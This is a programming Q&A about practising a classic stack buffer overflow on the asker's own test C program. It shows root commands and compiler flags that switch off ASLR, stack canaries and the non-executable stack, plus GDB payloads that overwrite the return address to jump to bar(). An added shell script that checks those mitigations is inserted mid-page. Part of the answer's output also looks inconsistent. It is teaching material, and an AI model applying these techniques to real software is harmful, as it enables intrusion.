Tags: c, gcc, stack-overflow

How do I test out buffer overflows on a modern system?


I'm currently interested in learning how to do buffer overflows. I've done quite a bit of assembly, and understand how the stack works and how to implement a buffer overflow in C. However, I'm running across quite a bit of trouble trying to get GCC 4.9.1 to allow me to overflow a buffer properly. I'm running Debian Jessie.

Here is the tutorial that I'm attempting to follow, in section 2.2. I've copy/pasted the C program he provides, and I'm using the same Perl script that he is, so everything is the exact same as his case (except the system, of course).

These are the results that I'm getting consistently:

 ~/projects/buffer-overflow$ ls
 run.pl  test.c
 ~/projects/buffer-overflow$ sudo su 
 root@wash# echo "0" > /proc/sys/kernel/randomize_va_space 
 root@wash# exit
 exit
 ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c 
 ~/projects/buffer-overflow$ ./run.pl 
 Address of foo = 0x804845b
 Address of bar = 0x80484a4
 My stack looks like:
 (nil)
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x8048657
 0xffffd494

 ABCDEFGHIJKLMNOPP@
 Now the stack looks like:
 0xffffd718
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x42418657
 0x46454443
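The session above switches off three separate mitigations (ASLR via randomize_va_space, the stack protector via -fno-stack-protector, and the non-executable stack via -zexecstack). As an added example that is not part of the original question or answer, the following POSIX shell script reports whether each of those mitigations is in effect for a given binary. It assumes Linux with binutils (readelf, nm) on the PATH; the header and symbol lines in the comments are constructed samples.

```shell
#!/bin/sh
# Added example (not the asker's or answerer's code): report the state of the
# three mitigations the question disables.  Assumes Linux and binutils.

# ASLR level from /proc/sys/kernel/randomize_va_space (0, 1 or 2).
aslr_status() {
  case "$1" in
    0) echo "ASLR off: no randomisation" ;;
    1) echo "ASLR partial: stack, mmap and vdso randomised, brk not" ;;
    2) echo "ASLR full: stack, mmap, vdso and brk randomised" ;;
    *) echo "unknown randomize_va_space value: $1" ;;
  esac
}

# Executable-stack check from the GNU_STACK program header printed by
# `readelf -lW`, e.g. (constructed sample line):
#   GNU_STACK  0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
# An "E" in the flags column means the binary was linked with -z execstack.
stack_status() {
  case "$1" in
    *GNU_STACK*RWE*) echo "stack executable (-z execstack)" ;;
    *GNU_STACK*)     echo "stack non-executable" ;;
    *)               echo "no GNU_STACK header" ;;
  esac
}

# Canary check: code built with -fstack-protector references __stack_chk_fail,
# e.g. (constructed sample line from `nm -u`): U __stack_chk_fail@GLIBC_2.4
# Absence means either -fno-stack-protector or no frame that qualified for a
# canary (plain -fstack-protector only protects functions with char arrays).
canary_status() {
  case "$1" in
    *__stack_chk_fail*) echo "stack protector present" ;;
    *) echo "stack protector absent (-fno-stack-protector or no protected frames)" ;;
  esac
}

# Run the real checks against a binary given on the command line.
check_binary() {
  bin="$1"
  aslr_status "$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null || echo unknown)"
  stack_status "$(readelf -lW "$bin" 2>/dev/null | grep GNU_STACK)"
  canary_status "$(nm -u "$bin" 2>/dev/null; readelf -sW "$bin" 2>/dev/null)"
}

if [ $# -eq 1 ]; then check_binary "$1"; fi
```

Running it as `sh check.sh ./a.out` against the binary built in the session should report ASLR off, an executable stack and no stack protector; a default `gcc test.c` build on the same machine should report the opposite for the last two.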

Solution

  • That Perl script isn't particularly useful here; different systems will use different addresses, so let's do it without the script...

    First of all, find out the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:

    (gdb) run `perl -e 'print "A" x 26';`
    Address of foo = 0x804845b
    Address of bar = 0x80484a5
    My stack looks like:
    0xf7fb1000
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x8048647
     0xffffdaa8
    
    AAAAAAAAAAAAAAAAAAAAAAAAAA
    Now the stack looks like:
    0xffffdcbb
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x41418647
    0x41414141
    
    
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    

    As you can see, 26 bytes will overwrite the EIP, so by replacing the last four "A" characters with our bar() function address (don't forget to put it in little endian format), we should have success:

    (gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
    Address of foo = 0x804845b
    Address of bar = 0x80484a5
    My stack looks like:
    0xf7fb1000
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x8048647
     0xffffdaa8
    
    AAAAAAAAAAAAAAAAAAAAAA��
    Now the stack looks like:
    0xffffdcbb
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x41418647
    0x41414141
    
    Augh! I've been hacked!
    
    Program received signal SIGSEGV, Segmentation fault.
    0xffffdc06 in ?? ()
    

    As you can see, we successfully returned to function bar().